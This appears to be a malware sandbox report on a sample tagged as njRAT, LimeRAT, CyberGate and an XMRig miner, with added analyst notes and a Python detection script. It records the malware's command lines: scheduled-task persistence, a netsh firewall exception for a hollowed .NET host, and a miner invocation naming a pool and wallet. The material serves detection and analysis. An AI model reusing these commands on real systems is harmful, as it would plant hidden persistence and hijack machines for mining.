Analysis Overview
SHA256
4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d
Threat Level: Known bad
The file 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d was found to be: Known bad.
Malicious Activity Summary
xmrig
njRAT/Bladabindi
CyberGate, Rebhip
LimeRAT
XMRig Miner Payload
Modifies Windows Firewall
UPX packed file
Executes dropped EXE
Checks computer location settings
Loads dropped DLL
Checks BIOS information in registry
Adds Run key to start application
Maps connected drives based on registry
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Drops file in System32 directory
AutoIT Executable
Enumerates physical storage devices
Program crash
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of AdjustPrivilegeToken
NTFS ADS
Creates scheduled task(s)
Suspicious use of WriteProcessMemory
Enumerates system info in registry
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-05-25 01:11
Signatures
AutoIT Executable
Analysis: behavioral1
Detonation Overview
Submitted
2022-05-25 01:11
Reported
2022-05-25 01:15
Platform
win7-20220414-en
Max time kernel
151s
Max time network
155s
Command Line
Signatures
CyberGate, Rebhip
LimeRAT
njRAT/Bladabindi
xmrig
XMRig Miner Payload
Executes dropped EXE
Modifies Windows Firewall
UPX packed file
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\efsui\data.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\n.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\efsui\data.exe | N/A |
Loads dropped DLL
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\moxia.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Windows\CurrentVersion\Run\BGPRAZQPUI = "C:\\Users\\Admin\\AppData\\Local\\MQSCAPIYWJHJXYP\\SystemProcess.exe" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\moxia.EXE | N/A |
Note: the wextract_cleanup0 RunOnce value (rundll32 advpack.dll,DelNodeRunDLL32 on the IXP000.TMP folder) is the standard cleanup entry written by a Windows IExpress self-extracting package, which identifies moxia.EXE as the IExpress wrapper that unpacks moxiacyb.exe; the Run value BGPRAZQPUI pointing at SystemProcess.exe is the persistence entry worth tracking.
Legitimate hosting services abused for malware hosting/C2
Maps connected drives based on registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
AutoIT Executable
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\winmgmts:\root\cimv2 | C:\Users\Admin\AppData\Roaming\efsui\data.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\winmgmts:\root\cimv2 | C:\Users\Admin\AppData\Roaming\efsui\data.exe | N/A |
Note: the indicator is the WMI moniker winmgmts:\root\cimv2 resolved relative to the process's current directory (System32/SysWOW64), so these two hits record a WMI connection by data.exe rather than a genuine file written into System32.
Suspicious use of SetThreadContext
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Users\Admin\AppData\Roaming\efsui\data.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Roaming\efsui\data.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Roaming\efsui\data.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\n.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\n.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Users\Admin\AppData\Local\Temp\n.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Roaming\efsui\data.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Roaming\efsui\data.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Users\Admin\AppData\Roaming\efsui\data.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\winmgmts:\root\cimv2 | C:\Users\Admin\AppData\Local\Temp\n.exe | N/A |
Note: the path is again the WMI moniker winmgmts:\root\cimv2 resolved relative to the process's working directory; the colon in it is what trips the alternate-data-stream heuristic, so this reflects WMI use by n.exe, not an ADS write.
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\c.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe
"C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe"
C:\Users\Admin\AppData\Local\Temp\moxia.EXE
"C:\Users\Admin\AppData\Local\Temp\moxia.EXE"
C:\Users\Admin\AppData\Local\Temp\c.exe
"C:\Users\Admin\AppData\Local\Temp\c.exe"
C:\Users\Admin\AppData\Local\Temp\li4.exe
"C:\Users\Admin\AppData\Local\Temp\li4.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe
C:\Users\Admin\AppData\Local\Temp\n.exe
"C:\Users\Admin\AppData\Local\Temp\n.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Users\Admin\AppData\Local\Temp\c.exe
"C:\Users\Admin\AppData\Local\Temp\c.exe"
C:\Users\Admin\AppData\Local\Temp\Legion Elite Proxies Grabber v1.exe
"C:\Users\Admin\AppData\Local\Temp\Legion Elite Proxies Grabber v1.exe"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\c.exe
"C:\Users\Admin\AppData\Local\Temp\c.exe"
C:\Users\Admin\AppData\Local\Temp\c.exe
"C:\Users\Admin\AppData\Local\Temp\c.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn LNUEFWGBWWOQ /tr C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe /sc minute /mo 1
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn LNUEFWGBWWOQ /tr C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe /sc onidle /i 1
C:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe
C:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe -o de2.moriaxmr.com:3333 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQtz7XNvpsygAzF9g1Y -p cyber -a cryptonight --max-cpu-usage 55
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /tn omadmprc /tr "C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe" /sc minute /mo 1 /F
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /tn GamePanel /tr "C:\Users\Admin\AppData\Roaming\Spectrum\service.exe" /sc minute /mo 1 /F
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /tn auditcse /tr "C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe" /sc minute /mo 1 /F
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe" "RegAsm.exe" ENABLE
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /tn ie4ushowIE /tr "C:\Users\Admin\AppData\Roaming\efsui\data.exe" /sc minute /mo 1 /F
C:\Windows\system32\taskeng.exe
taskeng.exe {734AD315-4209-4015-A1BF-8A6AB4AD31E7} S-1-5-21-1819626980-2277161760-1023733287-1000:TBHNEBSE\Admin:Interactive:[1]
C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe
C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe
C:\Users\Admin\AppData\Roaming\efsui\data.exe
C:\Users\Admin\AppData\Roaming\efsui\data.exe
C:\Users\Admin\AppData\Roaming\Spectrum\service.exe
C:\Users\Admin\AppData\Roaming\Spectrum\service.exe
C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe
C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe
C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe
C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe
C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe
"C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /tn auditcse /tr "C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe" /sc minute /mo 1 /F
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /tn omadmprc /tr "C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe" /sc minute /mo 1 /F
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /tn GamePanel /tr "C:\Users\Admin\AppData\Roaming\Spectrum\service.exe" /sc minute /mo 1 /F
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /tn ie4ushowIE /tr "C:\Users\Admin\AppData\Roaming\efsui\data.exe" /sc minute /mo 1 /F
C:\Users\Admin\AppData\Roaming\Spectrum\service.exe
C:\Users\Admin\AppData\Roaming\Spectrum\service.exe
C:\Users\Admin\AppData\Roaming\efsui\data.exe
C:\Users\Admin\AppData\Roaming\efsui\data.exe
C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe
C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe
C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe
C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe
C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe
C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe
C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe
"C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /tn auditcse /tr "C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe" /sc minute /mo 1 /F
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /tn omadmprc /tr "C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe" /sc minute /mo 1 /F
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /tn GamePanel /tr "C:\Users\Admin\AppData\Roaming\Spectrum\service.exe" /sc minute /mo 1 /F
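The process list above is the evidence chain for this sample: schtasks persistence that re-launches binaries under the user profile every minute (and on idle), a firewall exception for RegAsm.exe (the .NET utility the RAT is hollowed into, launched with no arguments), and an XMRig command line carrying the pool, wallet, algorithm and CPU cap. The Python below is an added example, not part of the sandbox report, that runs those checks over command lines copied from this page. The rule names, the "five minutes or less" interval threshold and the inclusion of InstallUtil and MSBuild alongside the RegAsm/RegSvcs hosts seen here are my assumptions.

```python
"""Triage Windows process command lines for the persistence, firewall-exception
and coin-miner patterns recorded in this sandbox report (added example)."""
import re
import shlex

# Constructed sample: command lines copied from the Processes section of the report.
SAMPLE_CMDLINES = [
    r'"C:\Users\Admin\AppData\Local\Temp\c.exe"',
    r'schtasks.exe /create /tn LNUEFWGBWWOQ /tr C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe /sc minute /mo 1',
    r'schtasks.exe /create /tn LNUEFWGBWWOQ /tr C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe /sc onidle /i 1',
    r'C:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe -o de2.moriaxmr.com:3333 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQtz7XNvpsygAzF9g1Y -p cyber -a cryptonight --max-cpu-usage 55',
    r'"C:\Windows\SysWOW64\schtasks.exe" /create /tn omadmprc /tr "C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe" /sc minute /mo 1 /F',
    r'netsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe" "RegAsm.exe" ENABLE',
    r'"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"',
]

# .NET utilities used as hollowing hosts. RegAsm and RegSvcs appear in this report;
# InstallUtil and MSBuild are added on the assumption that the same family uses them.
HOLLOW_HOSTS = {"regasm.exe", "regsvcs.exe", "installutil.exe", "msbuild.exe"}
# Anything under a user's AppData is writable without elevation.
USER_WRITABLE = re.compile(r"^c:\\users\\[^\\]+\\appdata\\", re.I)


def tokenize(cmdline):
    """Split a Windows command line; posix=False keeps backslashes literal."""
    return [t.strip('"') for t in shlex.split(cmdline, posix=False)]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def slash_flags(tokens):
    """Map '/opt value' pairs to a dict; bare switches such as /F map to True."""
    out, i = {}, 1
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("/"):
            if i + 1 < len(tokens) and not tokens[i + 1].startswith("/"):
                out[tok.lower()] = tokens[i + 1]
                i += 2
                continue
            out[tok.lower()] = True
        i += 1
    return out


def dash_flags(tokens):
    """Map '-o value' / '--long value' pairs (xmrig style) to a dict."""
    out = {}
    for i, tok in enumerate(tokens[1:-1], start=1):
        if tok.startswith("-") and not tokens[i + 1].startswith("-"):
            out[tok] = tokens[i + 1]
    return out


def triage(cmdline):
    """Return a finding dict for a suspicious command line, or None."""
    toks = tokenize(cmdline)
    if not toks:
        return None
    exe = basename(toks[0])

    if exe == "schtasks.exe":
        f = slash_flags(toks)
        target = f.get("/tr", "")
        if "/create" in f and USER_WRITABLE.match(target):
            sched = str(f.get("/sc", "")).lower()
            minute_mo = str(f.get("/mo", ""))
            tight = (sched == "minute" and minute_mo.isdigit() and int(minute_mo) <= 5) or sched == "onidle"
            if tight:  # a task that re-launches a user-profile binary every few minutes is a watchdog
                return {"rule": "schtasks_persistence_user_profile", "task": f.get("/tn"),
                        "target": target, "schedule": sched}

    if exe in ("netsh", "netsh.exe"):
        low = [t.lower() for t in toks]
        if "allowedprogram" in low and low.index("allowedprogram") + 1 < len(toks):
            prog = toks[low.index("allowedprogram") + 1]
            if basename(prog) in HOLLOW_HOSTS:
                return {"rule": "firewall_exception_for_dotnet_host", "program": prog}

    if exe in HOLLOW_HOSTS and len(toks) == 1:
        # RegAsm/RegSvcs normally take an assembly path; a bare launch is a hollowing target
        return {"rule": "dotnet_host_without_arguments", "program": toks[0]}

    d = dash_flags(toks)
    pool = d.get("-o") or d.get("--url")
    wallet = d.get("-u") or d.get("--user")
    if pool and wallet and len(wallet) >= 40:  # pool URL plus a long wallet string is the miner signature
        return {"rule": "xmrig_style_miner", "binary": toks[0], "pool": pool, "wallet": wallet,
                "algo": d.get("-a") or d.get("--algo"), "max_cpu": d.get("--max-cpu-usage")}
    return None


def triage_all(cmdlines):
    return [hit for hit in (triage(c) for c in cmdlines) if hit]


if __name__ == "__main__":
    for hit in triage_all(SAMPLE_CMDLINES):
        print(hit)
```

The schtasks rule keys on the target path, not the task name, because the task names here (omadmprc, GamePanel, auditcse, ie4ushowIE) are chosen to look like Windows components; a one-minute repetition against a binary under AppData is the durable signal.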
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | de2.moriaxmr.com | udp |
| US | 8.8.8.8:53 | red4.hopto.org | udp |
| US | 8.8.8.8:53 | red4.hopto.org | udp |
| US | 8.8.8.8:53 | red4.hopto.org | udp |
| US | 8.8.8.8:53 | red4.hopto.org | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.68.143:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | red4.hopto.org | udp |
| US | 8.8.8.8:53 | red4.hopto.org | udp |
| US | 8.8.8.8:53 | red4.hopto.org | udp |
| US | 8.8.8.8:53 | red4.hopto.org | udp |
| US | 8.8.8.8:53 | red4.hopto.org | udp |
Files
memory/1828-54-0x0000000075741000-0x0000000075743000-memory.dmp
\Users\Admin\AppData\Local\Temp\moxia.EXE
| MD5 | 1a47efc2dcfed8aada82c593e5796257 |
| SHA1 | 97c4c1949fd4ed8cd1b2d2e20ca106a28ce06d38 |
| SHA256 | b29e3e4130d2e4c2d4ece5ed419a0652f1bd587c4c7d99453d8b9a0eada57f59 |
| SHA512 | 34849e7c3400d25fcb48ccb0a13c6652c2acec54f6d847162d5eb52eaeb89c56748961d0e78a9bd587f15df359d1c7b4dc8db3be4cbb20b39d1d03d2279e428f |
memory/1396-59-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\moxia.EXE
| MD5 | 1a47efc2dcfed8aada82c593e5796257 |
| SHA1 | 97c4c1949fd4ed8cd1b2d2e20ca106a28ce06d38 |
| SHA256 | b29e3e4130d2e4c2d4ece5ed419a0652f1bd587c4c7d99453d8b9a0eada57f59 |
| SHA512 | 34849e7c3400d25fcb48ccb0a13c6652c2acec54f6d847162d5eb52eaeb89c56748961d0e78a9bd587f15df359d1c7b4dc8db3be4cbb20b39d1d03d2279e428f |
\Users\Admin\AppData\Local\Temp\c.exe
| MD5 | b712972e8c92249a42ae00df0ecfc6fd |
| SHA1 | f3dbc46c155296cca4435cefc6ddd8e22e82b2cb |
| SHA256 | 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f |
| SHA512 | 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65 |
C:\Users\Admin\AppData\Local\Temp\moxia.EXE
| MD5 | 1a47efc2dcfed8aada82c593e5796257 |
| SHA1 | 97c4c1949fd4ed8cd1b2d2e20ca106a28ce06d38 |
| SHA256 | b29e3e4130d2e4c2d4ece5ed419a0652f1bd587c4c7d99453d8b9a0eada57f59 |
| SHA512 | 34849e7c3400d25fcb48ccb0a13c6652c2acec54f6d847162d5eb52eaeb89c56748961d0e78a9bd587f15df359d1c7b4dc8db3be4cbb20b39d1d03d2279e428f |
\Users\Admin\AppData\Local\Temp\c.exe
| MD5 | b712972e8c92249a42ae00df0ecfc6fd |
| SHA1 | f3dbc46c155296cca4435cefc6ddd8e22e82b2cb |
| SHA256 | 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f |
| SHA512 | 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65 |
\Users\Admin\AppData\Local\Temp\moxia.EXE
| MD5 | 1a47efc2dcfed8aada82c593e5796257 |
| SHA1 | 97c4c1949fd4ed8cd1b2d2e20ca106a28ce06d38 |
| SHA256 | b29e3e4130d2e4c2d4ece5ed419a0652f1bd587c4c7d99453d8b9a0eada57f59 |
| SHA512 | 34849e7c3400d25fcb48ccb0a13c6652c2acec54f6d847162d5eb52eaeb89c56748961d0e78a9bd587f15df359d1c7b4dc8db3be4cbb20b39d1d03d2279e428f |
memory/932-68-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\li4.exe
| MD5 | fb9529e54e1b1bb55666d5df8aeb888a |
| SHA1 | 35c70da317dffd7872c4a4c514162e8ac46c95d3 |
| SHA256 | 405af27d2e97f3a2913284175a017042f3ada233be77b16d91f63753a5e8b388 |
| SHA512 | e3f1b0abc32333b487ddfd3849f4a6e85b677b21cf52bbaebbe753a648d1002a3029f70ffb07ba6825897058e74700f7a0150d0a615e8e19ac6ab2ee42e2ab54 |
C:\Users\Admin\AppData\Local\Temp\c.exe
| MD5 | b712972e8c92249a42ae00df0ecfc6fd |
| SHA1 | f3dbc46c155296cca4435cefc6ddd8e22e82b2cb |
| SHA256 | 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f |
| SHA512 | 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65 |
memory/1692-75-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\li4.exe
| MD5 | fb9529e54e1b1bb55666d5df8aeb888a |
| SHA1 | 35c70da317dffd7872c4a4c514162e8ac46c95d3 |
| SHA256 | 405af27d2e97f3a2913284175a017042f3ada233be77b16d91f63753a5e8b388 |
| SHA512 | e3f1b0abc32333b487ddfd3849f4a6e85b677b21cf52bbaebbe753a648d1002a3029f70ffb07ba6825897058e74700f7a0150d0a615e8e19ac6ab2ee42e2ab54 |
C:\Users\Admin\AppData\Local\Temp\c.exe
| MD5 | b712972e8c92249a42ae00df0ecfc6fd |
| SHA1 | f3dbc46c155296cca4435cefc6ddd8e22e82b2cb |
| SHA256 | 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f |
| SHA512 | 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65 |
C:\Users\Admin\AppData\Local\Temp\li4.exe
| MD5 | fb9529e54e1b1bb55666d5df8aeb888a |
| SHA1 | 35c70da317dffd7872c4a4c514162e8ac46c95d3 |
| SHA256 | 405af27d2e97f3a2913284175a017042f3ada233be77b16d91f63753a5e8b388 |
| SHA512 | e3f1b0abc32333b487ddfd3849f4a6e85b677b21cf52bbaebbe753a648d1002a3029f70ffb07ba6825897058e74700f7a0150d0a615e8e19ac6ab2ee42e2ab54 |
\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe
| MD5 | 398ec8f86f7fa6496441719de64b247a |
| SHA1 | 16906927268cc0d1c4722f6f2dc2045f8725826c |
| SHA256 | 7de324eecd765149b04bf2dc5c7e490602b3a95b4ec8a6b549f79ba69c279e63 |
| SHA512 | 029e46cf1d786970487deba06f241140f9ee350c475114cfda270d6ae93c3819445c87276e5970ddcdf8b48873107b941216420de7a4fee866aae8523d4a778e |
memory/1820-81-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\n.exe
| MD5 | ffc5e092773e0832f96d6c284ada0207 |
| SHA1 | 92933ecdcd09eb4751cce792d85d83c5fd5d3071 |
| SHA256 | fca838378cc164ed30f6fe6c0d81aea2ac6cbe65fe3afc174b8a11451fb49546 |
| SHA512 | ebe8ae3a31a31d93a7180e716bdcfd254ee987538cca0746bffcaee9a154eba114b83762e338bb0514f2670db385e5525d9ecb6d5d24c636fbab67c84acb9d85 |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe
| MD5 | 398ec8f86f7fa6496441719de64b247a |
| SHA1 | 16906927268cc0d1c4722f6f2dc2045f8725826c |
| SHA256 | 7de324eecd765149b04bf2dc5c7e490602b3a95b4ec8a6b549f79ba69c279e63 |
| SHA512 | 029e46cf1d786970487deba06f241140f9ee350c475114cfda270d6ae93c3819445c87276e5970ddcdf8b48873107b941216420de7a4fee866aae8523d4a778e |
\Users\Admin\AppData\Local\Temp\c.exe
| MD5 | b712972e8c92249a42ae00df0ecfc6fd |
| SHA1 | f3dbc46c155296cca4435cefc6ddd8e22e82b2cb |
| SHA256 | 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f |
| SHA512 | 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65 |
memory/1632-89-0x0000000000080000-0x00000000000CC000-memory.dmp
memory/1632-91-0x0000000000080000-0x00000000000CC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe
| MD5 | 398ec8f86f7fa6496441719de64b247a |
| SHA1 | 16906927268cc0d1c4722f6f2dc2045f8725826c |
| SHA256 | 7de324eecd765149b04bf2dc5c7e490602b3a95b4ec8a6b549f79ba69c279e63 |
| SHA512 | 029e46cf1d786970487deba06f241140f9ee350c475114cfda270d6ae93c3819445c87276e5970ddcdf8b48873107b941216420de7a4fee866aae8523d4a778e |
memory/1548-87-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\n.exe
| MD5 | ffc5e092773e0832f96d6c284ada0207 |
| SHA1 | 92933ecdcd09eb4751cce792d85d83c5fd5d3071 |
| SHA256 | fca838378cc164ed30f6fe6c0d81aea2ac6cbe65fe3afc174b8a11451fb49546 |
| SHA512 | ebe8ae3a31a31d93a7180e716bdcfd254ee987538cca0746bffcaee9a154eba114b83762e338bb0514f2670db385e5525d9ecb6d5d24c636fbab67c84acb9d85 |
C:\Users\Admin\AppData\Local\Temp\n.exe
| MD5 | ffc5e092773e0832f96d6c284ada0207 |
| SHA1 | 92933ecdcd09eb4751cce792d85d83c5fd5d3071 |
| SHA256 | fca838378cc164ed30f6fe6c0d81aea2ac6cbe65fe3afc174b8a11451fb49546 |
| SHA512 | ebe8ae3a31a31d93a7180e716bdcfd254ee987538cca0746bffcaee9a154eba114b83762e338bb0514f2670db385e5525d9ecb6d5d24c636fbab67c84acb9d85 |
memory/1632-105-0x000000000008BBCC-mapping.dmp
